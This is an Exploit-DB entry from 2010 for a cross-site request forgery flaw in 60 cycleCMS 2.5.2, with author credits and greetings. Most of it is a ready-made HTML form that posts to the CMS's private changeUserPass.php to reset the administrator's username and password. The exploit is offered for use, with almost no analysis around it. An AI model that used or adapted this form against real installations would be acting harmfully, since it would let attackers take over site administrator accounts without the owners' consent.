60 cycleCMS 2.5.2 - Cross-Site Request Forgery (Change Username and Password)

EDB-ID:

12266

CVE:

N/A


Platform:

PHP

Published:

2010-04-16

========================================================================================                  
| # Title    : 60 cycleCMS V 2.5.2 CSRF Change Username & Password Exploit
| # Author   : EL-KAHINA                                                                                                                 
| # Home     : www.iqs3cur1ty.com/vb     
| # Web Site : http://php.opensourcecms.com/scripts/details.php?scriptid=337                                                                            
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       
| # Bug      : CSRF                                                                      
======================      Exploit By indoushka       =================================
 # Exploit  : 
 
<html>
<body>
<h2>Change Username or Password</h2>
<p>Enter desired username and password.</p>
<form action="http://127.0.0.1/60cycleCMS.2.5.2/private/changeUserPass.php" method="post" name="changeUserPass">
Desired Username: <input name="user" type="text" /><br />
Desired Password: <input name="pass" type="password"/><br />
Confirm Desired Password: <input name="passConfirm" type="password"/><br />
<input type="button" value="Submit" onclick="checkForm(this.form)" />
</form>
</body>
</html>
 
==========================================
Greetz : Exploit-db Team 
all my friend :(Dz-Ghost Team ) 
im indoushka's sister
------------------------------------------